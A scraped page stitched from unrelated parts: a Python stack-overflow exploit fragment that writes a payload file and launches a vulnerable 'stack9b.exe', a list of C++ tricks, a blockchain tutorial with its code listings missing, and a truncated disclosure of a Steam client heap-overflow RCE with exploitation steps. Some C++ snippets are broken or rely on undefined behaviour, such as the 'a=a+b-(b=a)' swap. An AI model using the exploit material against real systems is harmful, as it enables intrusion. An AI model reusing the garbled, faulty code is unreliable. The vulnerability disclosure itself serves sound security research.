data = "\x21\x1210" + "\x12\x12$(" + "\xff" + buff + calc + "\x41" * 6 +  ebp_1c + ebp_18 + ebp_14 + ebp_10 + ebp_c + ebp_8 + ebp_4 + s + r + exit + ptr_calc

with open("fichero.dat", "w") as file:
	file.write(data)

subprocess.call(r"stack9b.exe")

What are some fun C++ tricks

This one applies to all languages so far:

a=a+b-(b=a);

A REALLY fast way of swaping a and b.

#include <iostream>
#include <string>

using namespace std;

int main (int argc, char*argv) {
float a; cout << «A:»; cin >> a;
float b; cout << «B:» ; cin >> b;

cout << «———————» << endl;
cout << «A=» << a << «, B=» << b << endl;
a=a+b-(b=a);
cout << «A=» << a << «, B=» << b << endl;
exit(0);
}


void Send(int * to, const int* from, const int count)

{

   int n = (count+7) / 8;

   switch(count%8)

   {

      case 0:

         do

            {

               *to++ = *from++;

      case 7:

               *to++ = *from++;

      case 6:

               *to++ = *from++;

      case 5:

               *to++ = *from++;

      case 4:

               *to++ = *from++;

      case 3:

               *to++ = *from++;

      case 2:

               *to++ = *from++;

      case 1:

               *to++ = *from++;

              } while (—n>0);

    }

}


Preprocessor Tricks

The arraysize macro used in Chrome’s source:

  1. template <typename T, size_t N>
  2. char (&ArraySizeHelper(T (&array)[N]))[N];
  3. #define arraysize(array) (sizeof(ArraySizeHelper(array)))

This is better than the ordinary sizeof(array)/sizeof(array[0]) because it raises compilation errors when the passed in array is just a pointer, or a null pointer whereas the simpler macro silently returns a useless value. For a detailed example, see PVS-Studio vs Chromium.

Predefined Macros:

  1. #define expect(expr) if(!expr) cerr << «Assertion « << #expr \
  2. » failed at « << __FILE__ << «:» << __LINE__ << endl;
  3. #define stringify(x) #x
  4. #define tostring(x) stringify(x)
  5. #define MAGIC_CONSTANT 314159
  6. cout << «Value of MAGIC_CONSTANT=» << tostring(MAGIC_CONSTANT);

The tostring macro is a common trick used to expand macro values inside other macros. The Linux kernel uses a lot of macro tricks.

Using iterators for quickly dumping the contents of a container:

  1. #define dbg(v) copy(v.begin(), v.end(), ostream_iterator<typeof(*v.begin())>(cout, » «))

Sadly, this doesn’t work for pair types so maps are out of scope.

Template Voodoo

Recursion:You can specialize your class templates for certain cases, so you can write down the base-case of a recursion and then define the generic template as a recursive combination of base cases.
For example, the following code calculates the values of the Choose function at compile time:

  1. template<unsigned n, unsigned r>
  2. struct Choose {
  3. enum {value = (n * Choose<n1, r1>::value) / r};
  4. };
  5. template<unsigned n>
  6. struct Choose<n, 0> {
  7. enum {value = 1};
  8. };
  9. int main() {
  10. // Prints 56
  11. cout << Choose<8, 3>::value;
  12. // Compile time values can be used as array sizes
  13. int x[Choose<25, 3>::value];
  14. }

More interesting examples at C++ Programming/Templates/Template Meta-Programming

Mostly Painless Memory Management and RAII

With certain restrictions, you can create templates for «smart» pointers that automatically deallocate resources when they go out of scope or reference count goes to 0. This is basically done by overloading operator * and operator =. Based on your use case, you can transfer ownership when the operator = is used, or update reference counts.
See Smart Pointer Guidelines — The Chromium Projects and http://code.google.com/searchfra…

Argument-dependent name lookup aka Koenig lookup

When a function call cannot be matched to a name in the current namespace, other namespaces can be searched for a matching signature. This is why std::cout << "Hi"; works even though operator << is defined in the stdnamespace.
See Argument-dependent name lookup


auto keyword
In C++ you can use auto to iterate over map,vector,set,..etc which specifies that the type of the variable that is being declared will be automatically deduced from its initializer or for functions it will the return type or it will be deduced from its return statements
So instead of :

  1. vector<int> vs;
  2. vs.push_back(4),vs.push_back(7),vs.push_back(9),vs.push_back(10);
  3. for (vector<int>::iterator it = vs.begin(); it != vs.end(); ++it)
  4. cout << *it << ‘ ‘;cout<<‘\n’;

just use :

  1. vector<int> vs;
  2. vs.push_back(4),vs.push_back(7),vs.push_back(9),vs.push_back(10);
  3. for (auto it: vs)
  4. cout << it << ‘ ‘;cout<<endl;
  5. //you can also change the values using
  6. vector<int> vs;
  7. vs.push_back(4),vs.push_back(7),vs.push_back(9),vs.push_back(10);
  8. for (auto& it: vs) it*=3;
  9. for (auto it: vs)
  10. cout << it << ‘ ‘;cout<<endl;

Declaring variable

  1. template<class A, class B>
  2. auto mult(A x, B y) -> decltype(x * y){
  3. return x * y;
  4. }
  5. int main(){
  6. auto a = 3 * 2; //the return type is the type of operator (x*y)
  7. cout<<a<<endl;
  8. return 0;
  9. }

The Power of Strings 

  1. int n,m;
  2. cin >> n >> m;
  3. int matrix[n+1][m+1];
  4. //This loop
  5. for(int i = 1; i <= n; i++) {
  6. for(int j = 1; j <= m; j++)
  7. cout << matrix[i][j] << » «;
  8. cout << «\n»;
  9. }
  10. // is equivalent to this
  11. for(int i = 1; i <= n; i++)
  12. for(int j = 1; j <= m; j++)
  13. cout << matrix[i][j] << » \n»[j == m];

because " \n" is a char*," \n"[0] is ' ' and " \n"[1] is '\n'  .

Some Hidden function
__gcd(x, y)
you don’t need to code gcd function.

  1. cout<<__gcd(54,48)<<endl; //return 6

__builtin_ffs(x)
This function returns 1 + least significant 1-bit of x. If x == 0, returns 0. Here x is int, this function with suffix ‘l’ gets a long argument and with suffix ‘ll’ gets a long long argument.
e.g:  __builtin_ffs(10) = 2 because 10 is ‘…10 1 0′ in base 2 and first 1-bit from right is at index 1 (0-based) and function returns 1 + index.three)

Pairing tricks 

  1. pair<int, int> p;
  2. //This
  3. p = make_pair(1, 2);
  4. //equivalent to this
  5. p = {1, 2};
  6. //So
  7. pair<int, pair<char, long long> > p;
  8. //now easier
  9. p = {1, {‘a’, 2ll}};

Super include 
Simply use
#include <bits/stdc++.h>
This library includes many of libraries we do need  like algorithm, iostream, vector and many more. Believe me you don’t need to include anything else 😀 !!

Smart Pointers

Using smart pointers, we can make pointers to work in way that we don’t need to explicitly call delete. Smart pointer is a wrapper class over a pointer with operator like * and -> overloaded. The objects of smart pointer class look like pointer, but can do many things that a normal pointer can’t like automatic destruction (yes, we don’t have to explicitly use delete), reference counting and more.
The idea is to make a class with a pointer, destructor and overloaded operators like * and ->. Since destructor is automatically called when an object goes out of scope, the dynamically alloicated memory would automatically deleted (or reference count can be decremented).


You can put URIs in your C++ code and the compiler will not throw any error.

  1. #include <iostream>
  2. int main() {
  3. using namespace std;
  4. http://www.google.com
  5. int x = 5;
  6. cout << x;
  7. }

Explanation: Any identifier followed by a : becomes a (goto) label in C++. Anything followed by // becomes a comment so in the code above, http is a label and //google.com/is a comment. The compiler might throw a warning however, since the label is unutilized.


Don’t Confuse Assign (=) with Test-for-Equality (==).

This one is elementary, although it might have baffled Sherlock Holmes. The following looks innocent and would compile and run just fine if C++ were more like BASIC:

if (a = b)
cout << «a is equal to b.»;

Because this looks so innocent, it creates logic errors requiring hours to track down within a large program unless you’re on the lookout for it. (So when a program requires debugging, this is the first thing I look for.) In C and C++, the following is not a test for equality:

a = b

What this does, of course, is assign the value of b to a and then evaluate to the value assigned.
The problem is that a = b does not generally evaluate to a reasonable true/false condition—with one major exception I’ll mention later. But in C and C++, any numeric value can be used as a condition for “if” or “while.
Assume that a and b are set to 0. The effect of the previously-shown if statement is to place the value of b into a; then the expression a = b evaluates to 0. The value 0 equates to false. Consequently, aand b are equal, but exactly the wrong thing gets printed:

if (a = b)     // THIS ENSURES a AND b ARE EQUAL…
cout << «a and b are equal.»;
else
cout << «a and b are not equal.»;  // BUT THIS GETS PRINTED!

The solution, of course, is to use test-for-equality when that’s what you want. Note the use of double equal signs (==). This is correct inside a condition.

// CORRECT VERSION:
if (a == b)
cout << «a and b are equal.»;


The most amazing trick i found was a status of someone’s topcoder profile:
Code:
#include <cstdio>
double m[]= {7709179928849219.0, 771};
int main()
{
m[1]—?m[0]*=2,main():printf((char*)m);
}
You will be seriously amazed by the ouput…here it is:
C++Sucks

I tried to analyse the code and came up with a reason but not an exact explanation..so i tried to ask it on stackoverflow..you can go through the explanation here:
Concept behind this 4 lines tricky C++ code
Read it and you will learn something you wouldn’t have even thought of… 😉


  1. static const unsigned char BitsSetTable256[256] =
  2. {
  3. # define B2(n) n, n+1, n+1, n+2
  4. # define B4(n) B2(n), B2(n+1), B2(n+1), B2(n+2)
  5. # define B6(n) B4(n), B4(n+1), B4(n+1), B4(n+2)
  6. B6(0), B6(1), B6(1), B6(2)
  7. };
  8. unsigned int v; // count the number of bits set in 32-bit value v
  9. unsigned int c; // c is the total bits set in v
  10. // Option 1:
  11. c = BitsSetTable256[v & 0xff] +
  12. BitsSetTable256[(v >> 8) & 0xff] +
  13. BitsSetTable256[(v >> 16) & 0xff] +
  14. BitsSetTable256[v >> 24];
  15. // Option 2:
  16. unsigned char * p = (unsigned char *) &v;
  17. c = BitsSetTable256[p[0]] +
  18. BitsSetTable256[p[1]] +
  19. BitsSetTable256[p[2]] +
  20. BitsSetTable256[p[3]];
  21. // To initially generate the table algorithmically:
  22. BitsSetTable256[0] = 0;
  23. for (int i = 0; i < 256; i++)
  24. {
  25. BitsSetTable256[i] = (i & 1) + BitsSetTable256[i / 2];
  26. }

 

 

  1. float Q_rsqrt( float number )
  2. {
  3. long i;
  4. float x2, y;
  5. const float threehalfs = 1.5F;
  6. x2 = number * 0.5F;
  7. y = number;
  8. i = * ( long * ) &y; // evil floating point bit level hacking
  9. i = 0x5f3759df - ( i >> 1 ); // what the fuck?
  10. y = * ( float * ) &i;
  11. y = y * ( threehalfs - ( x2 * y * y ) ); // 1st iteration
  12. // y = y * ( threehalfs - ( x2 * y * y ) ); // 2nd iteration, this can be removed
  13. return y;
  14. }

Iteration: 

  1. #define FOR(i,n) for(int (i)=0;(i)<(n);(i)++)
  2. #define FORR(i,a,b) for(int (i)=(a);(i)<(b);(i)++)
  3. //reverse
  4. #define REV(i,n) for(int (i)=(n)-1;(i)>=0;(i)--)

Handy way to use it like this. 

  1. typedef long long int int64;
  2. typedef unsigned long long int uint64;

FastIO for +ve integers.

    1. inline void frint(int *a){
    2. register char c=0;while (c<33) c=getchar_unlocked();*a=0;
    3. while (c>33){*a=*a*10+c-'0';c=getchar_unlocked();}
    4. }

Try This….

#include <iostream>
using namespace std;
int main()
{
int a,b,c;
int count = 1;
for (b=c=10;a=»- FIGURE?, UMKC,XYZHello Folks,\
TFy!QJu ROo TNn(ROo)SLq SLq ULo+\
UHs UJq TNn*RPn/QPbEWS_JSWQAIJO^\
NBELPeHBFHT}TnALVlBLOFAkHFOuFETp\
HCStHAUFAgcEAelclcn^r^r\\tZvYxXy\
T|S~Pn SPm SOn TNn ULo0ULo#ULo-W\
Hq!WFs XDt!» [b+++21]; )
for(; a— > 64 ; )
putchar ( ++c==’Z’ ? c = c/ 9:33^b&1);
return 0;
}


I think one of the coolest of all time, is defining an abstract base class in C++, and inheriting from it in python, and passing it back to C++ to call.
It actually works

  1. struct Interface{
  2. int foo()const=0;
  3. virtual ~Interface(){}
  4. };
  5. void call(Interface const& f){
  6. std::cout<<f.foo()<<std::endl;
  7. }
  8. struct InterfaceWrap final: Interface, boost::python::wrapper<Interface>
  9. {
  10. int foo() const final
  11. {
  12. return this->get_override("foo")();
  13. }
  14. };
  15. BOOST_PYTHON_MODULE(interface){
  16. using namespace boost::python;
  17. class_<Interface ,boost ::noncopyable,boost::shared_ptr<Interface>>("_InterfaceCpp",no_init)
  18. .def("foo",&Interface::foo)
  19. ;
  20. class_<InterfaceWrap ,bases<Interface>,boost::shared_ptr<InterfaceWrap>>("Interface",init<>())
  21. ;
  22. def("call",&call);
  23. }

and then

  1. import interface as i # C++ code
  2. class impl(i.Interface):#inherit from C++ class
  3. def __init__(self):
  4. i.Interface.__init__(self)
  5. def foo(self):
  6. return 100
  7. i.call(impl())#call C++ function with Python derived class

This does exactly what you think it should do.


void qsort ( void * base, size_t num, size_t size, int ( * compar ) ( const void *, const void * ) )

base Pointer to the first element of the array to be sorted.

num Number of elements in the array pointed by base. size_t is an unsigned integral type.

size Size in bytes of each element in the array. size_t is an unsigned integral type.

compar Function that compares two elements. This function is called repeatedly by qsorttocomparetwoelements.It shall follow the following prototype:

int compar ( const void * elem1, const void * elem2 );

Taking a pointer to two pointers as arguments (both type-casted to const void*). The function should compare the data pointed by both: if they match in ranking, the function shall return zero; if elem1 goes before elem2, it shall return a negative value; and if it goes after, a positive value.

Eg :

int values[] = { 40, 10, 100, 90, 20, 25 };

int compare (const void * a, const void * b) { return ( *(int*)a — *(int*)b ); }

int main () {
int n;
qsort (values, 6, sizeof(int), compare);
for (n=0; n<6; n++) printf («%d «,values[n]); return 0; }


Partial template specialization

C++11 has this cool function get<J> which can be used to access the first and second member of a pair, with a different syntax:

  1. std::pair < std::string, double > pr ( «pi», 3.14 );
  2. std::cout << std::get < 0 > ( pr ); // outputs «pi»
  3. std::cout << std::get < 1 > ( pr ); // outputs 3.14

Note that this is a function and not a function object or a member function.

I do not find it trivial to write a function

  • with three template types template < size_t J, class T1, class T2 >
  • which can get std::pair < T1, T2 > as an argument
  • and outputs pr.first if the template value J is 0
  • and outputs pr.second if the template value J is 1.

In particular consider that in C++ one cannot overload a function based on its return type. So what should the return type of this function be declared as? T1 or T2?

  1. template < size_t J, class T1, class T2>
  2. ??? get ( std::pair < T1, T2 > & );

The interesting thing is that one could already write this function in C++98 using Partial template specialization, which is a really cool trick. The problem is that function templates cannot be partially specialized, but this is easy to solve:

  1. namespace
  2. {
  3. /*!
  4. * helper template to do the work with partial specialization
  5. */
  6. template < size_t J, class T1, class T2 >
  7. struct Get;
  8. template < class T1, class T2>
  9. struct Get < 0, T1, T2 >
  10. {
  11. typedef typename std::pair < T1, T2 >::first_type result_type;
  12. static result_type & elm ( std::pair < T1, T2 > & pr ) { return pr.first; }
  13. static const result_type & elm ( const std::pair < T1, T2 > & pr ) { return pr.first; }
  14. };
  15. template < class T1, class T2>
  16. struct Get < 1, T1, T2 >
  17. {
  18. typedef typename std::pair < T1, T2 >::second_type result_type;
  19. static result_type & elm ( std::pair < T1, T2 > & pr ) { return pr.second; }
  20. static const result_type & elm ( const std::pair < T1, T2 > & pr ) { return pr.second; }
  21. };
  22. }
  23. template < size_t J, class T1, class T2 >
  24. typename Get< J, T1, T2 >::result_type & get ( std::pair< T1, T2 > & pr )
  25. {
  26. return Get < J, T1, T2 >::elm( pr );
  27. }
  28. template < size_t J, class T1, class T2 >
  29. const typename Get< J, T1, T2 >::result_type & get ( const std::pair< T1, T2 > & pr )
  30. {
  31. return Get < J, T1, T2 >::elm( pr );
  32. }

Define operator<< for STL structures to make it easy to add debug outputs to your code. (This is better than special printing functions because it nests automatically! Printing a map< vector<int>, int> works without any additional effort if you can print any map and any vector.)

Additionally, define a macro that makes nicer debug outputs and makes it easy to turn them off using the standard mechanism (same one that is used for assert). Here’s a short example how to do all of this in C++11:

  1. #include <iostream>
  2. #include <string>
  3. #include <map>
  4. #ifdef NDEBUG
  5. #define DEBUG(var)
  6. #else
  7. #define DEBUG(var) { std::cout << #var << ": " << (var) << std::endl; }
  8. #endif
  9. template<typename T1, typename T2>
  10. std::ostream& operator<< (std::ostream& out, const std::map<T1,T2> &M) {
  11. out << "{ ";
  12. for (auto item:M) out << item.first << "->" << item.second << ", ";
  13. out << "}";
  14. return out;
  15. }
  16. int main() {
  17. std::map<std::string,int> age = { {"Joe",47}, {"Bob",22}, {"Laura",19} };
  18. DEBUG(age);
  19. }

This is a very amazing piece of code:

main(a){printf(a,34,a=»main(a){printf(a,34,a=%c%s%c,34);}»,34);}

It is the shortest C++ code which when executed prints itself. It was discovered by Vlad Taeerov and Rashit Fakhreyev and is only 64 characters in length(Making it the shortest).


To Convert list<T> to vector<T>:

  1. std::vector<T> v(l.begin(), l.end());

 

Variadic Templates :

They can be useful in places. You can pass any number of parameters .
Example  :

  1. #include <iostream>
  2. #include <bitset>
  3. #include <string>
  4. using namespace std;
  5.  
  6. void print() {
  7. cout<<«Nothing to print :)» ;
  8. }
  9.  
  10. template<typename T,typename args>
  11. void print(T x,args y) {
  12. cout<<x<<endl;
  13. print(y…);
  14. }
  15.  
  16. int main() {
  17. print(10,14.56,«Quora»,bitset<20>(28));
  18. return 0;
  19. }

 

Code on ideon : http://ideone.com/b8TNHD

Output :

  1. 10
  2. 14.56
  3. Quora
  4. 00000000000000011100
  5. Nothing to print 🙂

 

Range based for loops can be used with some STL containers :
eg.

 

  1. #include <iostream>
  2. #include <list>
  3. #include <vector>
  4.  
  5. using namespace std;
  6.  
  7. int main() {
  8. list<int> x;
  9. x.push_back(10);
  10. x.push_back(20);
  11. for(auto i : x)
  12. cout<<i;
  13. return 0;
  14. }

Build a blockchain with C++

So, you might have heard a lot about something called a blockchain lately and wondered what all the fuss is about. A blockchain is a ledger which has been written in such a way that updating the data contained within it becomes very difficult, some say the blockchain is immutable and to all intents and purposes they’re right but immutability suggests permanence and nothing on a hard drive could ever be considered permanent. Anyway, we’ll leave the philosophical debate to the non-techies; you’re looking for someone to show you how to write a blockchain in C++, so that’s exactly what I’m going to do.

Before I go any further, I have a couple of disclaimers:

  1. This tutorial is based on one written by Savjee using NodeJS; and
  2. It’s been a while since I wrote any C++ code, so I might be a little rusty.

The first thing you’ll want to do is open a new C++ project, I’m using CLion from JetBrains but any C++ IDE or even a text editor will do. For the interests of this tutorial we’ll call the project TestChain, so go ahead and create the project and we’ll get started.

If you’re using CLion you’ll see that the main.cpp file will have already been created and opened for you; we’ll leave this to one side for the time being.

Create a file called Block.h in the main project folder, you should be able to do this by right-clicking on the TestChain directory in the Project Tool Window and selecting: New > C/C++ Header File.

Inside the file, add the following code (if you’re using CLion place all code between the lines that read #define TESTCHAIN_BLOCK_H and #endif):

These lines above tell the compiler to include the cstdint, and iostream libraries.

Add this line below it:

This essentially creates a shortcut to the std namespace, which means that we don’t need to refer to declarations inside the stdnamespace by their full names e.g. std::string, but instead use their shortened names e.g. string.

So far, so good; let’s start fleshing things out a little more.

A blockchain is made up of a series of blocks which contain data and each block contains a cryptographic representation of the previous block, which means that it becomes very hard to change the contents of any block without then needing to change every subsequent one; hence where the blockchain essentially gets its immutable properties.

So let’s create our block class, add the following lines to the Block.h header file:

Unsurprisingly, we’re calling our class Block (line 1) followed by the public modifier (line 2) and public variable sPrevHash(remember each block is linked to the previous block) (line 3). The constructor signature (line 5) takes three parameters for nIndexIn, and sDataIn; note that the const keyword is used along with the reference modifier (&) so that the parameters are passed by reference but cannot be changed, this is done to improve efficiency and save memory. The GetHash method signature is specified next (line 7) followed by the MineBlock method signature (line 9), which takes a parameter nDifficulty. We specify the private modifier (line 11) followed by the private variables _nIndex, _nNonce, _sData, _sHash, and _tTime (lines 12–16). The signature for _CalculateHash (line 18) also has the const keyword, this is to ensure the output from the method cannot be changed which is very useful when dealing with a blockchain.

Now it’s time to create our Blockchain.h header file in the main project folder.

Let’s start by adding these lines (if you’re using CLion place all code between the lines that read #define TESTCHAIN_BLOCKCHAIN_H and #endif):

They tell the compiler to include the cstdint, and vector libraries, as well as the Block.h header file we have just created, and creates a shortcut to the std namespace.

Now let’s create our blockchain class, add the following lines to the Blockchain.h header file:

As with our block class, we’re keeping things simple and calling our blockchain class Blockchain (line 1) followed by the publicmodifier (line 2) and the constructor signature (line 3). The AddBlock signature (line 5) takes a parameter bNew which must be an object of the Block class we created earlier. We then specify the private modifier (line 7) followed by the private variables for _nDifficulty, and _vChain (lines 8–9) as well as the method signature for _GetLastBlock (line 11) which is also followed by the const keyword to denote that the output of the method cannot be changed.

Ain't nobody got time for that!Since blockchains use cryptography, now would be a good time to get some cryptographic functionality in our blockchain. We’re going to be using the SHA256 hashing technique to create hashes of our blocks, we could write our own but really – in this day and age of open source software – why bother?

To make my life that much easier, I copied and pasted the text for the sha256.h, sha256.cpp and LICENSE.txt files shown on the C++ sha256 function from Zedwood and saved them in the project folder.

Right, let’s keep going.

Create a source file for our block and save it as Block.cpp in the main project folder; you should be able to do this by right-clicking on the TestChain directory in the Project Tool Window and selecting: New > C/C++ Source File.

Start by adding these lines, which tell the compiler to include the Block.h and sha256.h files we added earlier.

Follow these with the implementation of our block constructor:

The constructor starts off by repeating the signature we specified in the Block.h header file (line 1) but we also add code to copy the contents of the parameters into the the variables _nIndex, and _sData. The _nNonce variable is set to -1 (line 2) and the _tTime variable is set to the current time (line 3).

Let’s add an accessor for the block’s hash:

We specify the signature for GetHash (line 1) and then add a return for the private variable _sHash (line 2).

As you might have read, blockchain technology was made popular when it was devised for the Bitcoin digital currency, as the ledger is both immutable and public; which means that, as one user transfers Bitcoin to another user, a transaction for the transfer is written into a block on the blockchain by nodes on the Bitcoin network. A node is another computer which is running the Bitcoin software and, since the network is peer-to-peer, it could be anyone around the world; this process is called ‘mining’ as the owner of the node is rewarded with Bitcoin each time they successfully create a valid block on the blockchain.

To successfully create a valid block, and therefore be rewarded, a miner must create a cryptographic hash of the block they want to add to the blockchain that matches the requirements for a valid hash at that time; this is achieved by counting the number of zeros at the beginning of the hash, if the number of zeros is equal to or greater than the difficulty level set by the network that block is valid. If the hash is not valid a variable called a nonce is incremented and the hash created again; this process, called Proof of Work (PoW), is repeated until a hash is produced that is valid.

So, with that being said, let’s add the MineBlock method; here’s where the magic happens!

We start with the signature for the MineBlock method, which we specified in the Block.h header file (line 1), and create an array of characters with a length one greater that the value specified for nDifficulty (line 2). A for loop is used to fill the array with zeros, followed by the final array item being given the string terminator character (\0), (lines 3–6) then the character array or c-string is turned into a standard string (line 8). A do…while loop is then used (lines 10–13) to increment the _nNonce and _sHashis assigned with the output of _CalculateHash, the front portion of the hash is then compared the string of zeros we’ve just created; if no match is found the loop is repeated until a match is found. Once a match is found a message is sent to the output buffer to say that the block has been successfully mined (line 15).

We’ve seen it mentioned a few times before, so let’s now add the _CalculateHash method:

We kick off with the signature for the _CalculateHash method (line 1), which we specified in the Block.h header file, but we include the inline keyword which makes the code more efficient as the compiler places the method’s instructions inline wherever the method is called; this cuts down on separate method calls. A string stream is then created (line 2), followed by appending the values for _nIndex, _tTime, _sData, _nNonce, and sPrevHash to the stream (line 3). We finish off by returning the output of the sha256 method (from the sha256 files we added earlier) using the string output from the string stream (line 5).

Right, let’s finish off our blockchain implementation! Same as before, create a source file for our blockchain and save it as Blockchain.cpp in the main project folder.

Add these lines, which tell the compiler to include the Blockchain.h file we added earlier.

Follow these with the implementation of our blockchain constructor:

We start off with the signature for the blockchain constructor we specified in Blockchain.h (line 1). As a blocks are added to the blockchain they need to reference the previous block using its hash, but as the blockchain must start somewhere we have to create a block for the next block to reference, we call this a genesis block. A genesis block is created and placed onto the _vChain vector (line 2). We then set the _nDifficulty level (line 3) depending on how hard we want to make the PoW process.

Now it’s time to add the code for adding a block to the blockchain, add the following lines:

The signature we specified in Blockchain.h for AddBlock is added (line 1) followed by setting the sPrevHash variable for the new block from the hash of the last block on the blockchain which we get using _GetLastBlock and its GetHash method (line 2). The block is then mined using the MineBlock method (line 3) followed by the block being added to the _vChain vector (line 4), thus completing the process of adding a block to the blockchain.

Let’s finish this file off by adding the last method:

We add the signature for _GetLastBlock from Blockchain.h (line 1) followed by returning the last block found in the _vChainvector using its back method (line 2).

Right, that’s almost it, let’s test it out!

Remember the main.cpp file? Now’s the time to update it, open it up and replace the contents with the following lines:

This tells the compiler to include the Blockchain.h file we created earlier.

Then add the following lines:

As with most C/C++ programs, everything is kicked off by calling the main method, this one creates a new blockchain (line 2) and informs the user that a block is being mined by printing to the output buffer (line 4) then creates a new block and adds it to the chain (line 5); the process for mining that block will then kick off until a valid hash is found. Once the block is mined the process is repeated for two more blocks.

Time to run it! If you are using CLion simply hit the ‘Run TestChain’ button in the top right hand corner of the window. If you’re old skool, you can compile and run the program using the following commands from the command line:

If all goes well you should see an output like this:

Congratulations, you have just written a blockchain from scratch in C++, in case you got lost I’ve put all the files into a Github repo. Since the original code for Bitcoin was also written in C++, why not take a look at its code and see what improvements you can make to what we’ve started off today?

Orig post

Remote Code Execution Vulnerability in the Steam Client

Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

This blog post explains the story behind a bug which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.

The keen-eyed, security conscious PC gamers amongst you may have noticed that Valve released a new update to the Steam client in recent weeks.
This blog post aims to justify why we play games in the office explain the story behind the corresponding bug, which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.
Since July, when Valve (finally) compiled their code with modern exploit protections enabled, it would have simply caused a client crash, with RCE only possible in combination with a separate info-leak vulnerability.
Our vulnerability was reported to Valve on the 20th February 2018 and to their credit, was fixed in the beta branch less than 12 hours later. The fix was pushed to the stable branch on the 22nd March 2018.

Overview

At its core, the vulnerability was a heap corruption within the Steam client library that could be remotely triggered, in an area of code that dealt with fragmented datagram reassembly from multiple received UDP packets.

The Steam client communicates using a custom protocol – the “Steam protocol” – which is delivered on top of UDP. There are two fields of particular interest in this protocol which are relevant to the vulnerability:

  • Packet length
  • Total reassembled datagram length

The bug was caused by the absence of a simple check to ensure that, for the first packet of a fragmented datagram, the specified packet length was less than or equal to the total datagram length. This seems like a simple oversight, given that the check was present for all subsequent packets carrying fragments of the datagram.

Without additional info-leaking bugs, heap corruptions on modern operating systems are notoriously difficult to control to the point of granting remote code execution. In this case, however, thanks to Steam’s custom memory allocator and (until last July) no ASLR on the steamclient.dll binary, this bug could have been used as the basis for a highly reliable exploit.

What follows is a technical write-up of the vulnerability and its subsequent exploitation, to the point where code execution is achieved.

Vulnerability Details

PREREQUISITE KNOWLEDGE

Protocol

The Steam protocol has been reverse engineered and well documented by others (e.g. https://imfreedom.org/wiki/Steam_Friends) from analysis of traffic generated by the Steam client. The protocol was initially documented in 2008 and has not changed significantly since then.

The protocol is implemented as a connection-orientated protocol over the top of a UDP datagram stream. The packet structure, as documented in the existing research linked above, is as follows:

Key points:

  • All packets start with the 4 bytes “VS01
  • packet_len describes the length of payload (for unfragmented datagrams, this is equal to data length)
  • type describes the type of packet, which can take the following values:
    • 0x2 Authenticating Challenge
    • 0x4 Connection Accept
    • 0x5 Connection Reset
    • 0x6 Packet is a datagram fragment
    • 0x7 Packet is a standalone datagram
  • The source and destination fields are IDs assigned to correctly route packets from multiple connections within the steam client
  • In the case of the packet being a datagram fragment:
    • split_count refers to the number of fragments that the datagram has been split up into
    • data_len refers to the total length of the reassembled datagram
  • The initial handling of these UDP packets occurs in the CUDPConnection::UDPRecvPkt function within steamclient.dll

Encryption

The payload of the datagram packet is AES-256 encrypted, using a key negotiated between the client and server on a per-session basis. Key negotiation proceeds as follows:

  • Client generates a 32-byte random AES key and RSA encrypts it with Valve’s public key before sending to the server.
  • The server, in possession of the private key, can decrypt this value and accepts it as the AES-256 key to be used for the session
  • Once the key is negotiated, all payloads sent as part of this session are encrypted using this key.

VULNERABILITY

The vulnerability exists within the RecvFragment method of the CUDPConnection class. No symbols are present in the release version of the steamclient library, however a search through the strings present in the binary will reveal a reference to “CUDPConnection::RecvFragment” in the function of interest. This function is entered when the client receives a UDP packet containing a Steam datagram of type 0x6 (Datagram fragment).

1. The function starts by checking the connection state to ensure that it is in the “Connected” state.
2. The data_len field within the Steam datagram is then inspected to ensure it contains fewer than a seemingly arbitrary 0x20000060 bytes.
3. If this check is passed, it then checks to see if the connection is already collecting fragments for a particular datagram or whether this is the first packet in the stream.

Figure 1

4. If this is the first packet in the stream, the split_count field is then inspected to see how many packets this stream is expected to span
5. If the stream is split over more than one packet, the seq_no_of_first_pkt field is inspected to ensure that it matches the sequence number of the current packet, ensuring that this is indeed the first packet in the stream.
6. The data_len field is again checked against the arbitrary limit of 0x20000060 and also the split_count is validated to be less than 0x709bpackets.

Figure 2

7. If these assertions are true, a Boolean is set to indicate we are now collecting fragments and a check is made to ensure we do not already have a buffer allocated to store the fragments.

Figure 3

8. If the pointer to the fragment collection buffer is non-zero, the current fragment collection buffer is freed and a new buffer is allocated (see yellow box in Figure 4 below). This is where the bug manifests itself. As expected, a fragment collection buffer is allocated with a size of data_lenbytes. Assuming this succeeds (and the code makes no effort to check – minor bug), then the datagram payload is then copied into this buffer using memmove, trusting the field packet_len to be the number of bytes to copy. The key oversight by the developer is that no check is made that packet_len is less than or equal to data_len. This means that it is possible to supply a data_len smaller than packet_len and have up to 64kb of data (due to the 2-byte width of the packet_len field) copied to a very small buffer, resulting in an exploitable heap corruption.

Figure 4

Exploitation

This section assumes an ASLR work-around is present, leading to the base address of steamclient.dll being known ahead of exploitation.

SPOOFING PACKETS

In order for an attacker’s UDP packets to be accepted by the client, they must observe an outbound (client->server) datagram being sent in order to learn the client/server IDs of the connection along with the sequence number. The attacker must then spoof the UDP packet source/destination IPs and ports, along with the client/server IDs and increment the observed sequence number by one.

MEMORY MANAGEMENT

For allocations larger than 1024 (0x400) bytes, the default system allocator is used. For allocations smaller or equal to 1024 bytes, Steam implements a custom allocator that works in the same way across all supported platforms. In-depth discussion of this custom allocator is beyond the scope of this blog, except for the following key points:

  1. Large blocks of memory are requested from the system allocator that are then divided into fixed-size chunks used to service memory allocation requests from the steam client.
  2. Allocations are sequential with no metadata separating the in-use chunks.
  3. Each large block maintains its own freelist, implemented as a singly linked list.
  4. The head of the freelist points to the first free chunk in a block, and the first 4-bytes of that chunk points to the next free chunk if one exists.

Allocation

When a block is allocated, the first free block is unlinked from the head of the freelist, and the first 4-bytes of this block corresponding to the next_free_block are copied into the freelist_head member variable within the allocator class.

Deallocation

When a block is freed, the freelist_head field is copied into the first 4 bytes of the block being freed (next_free_block), and the address of the block being freed is copied into the freelist_head member variable within the allocator class.

ACHIEVING A WRITE-WHAT-WHERE PRIMITIVE

The buffer overflow occurs in the heap, and depending on the size of the packets used to cause the corruption, the allocation could be controlled by either the default Windows allocator (for allocations larger than 0x400 bytes) or the custom Steam allocator (for allocations smaller than 0x400 bytes). Given the lack of security features of the custom Steam allocator, I chose this as the simpler of the two to exploit.

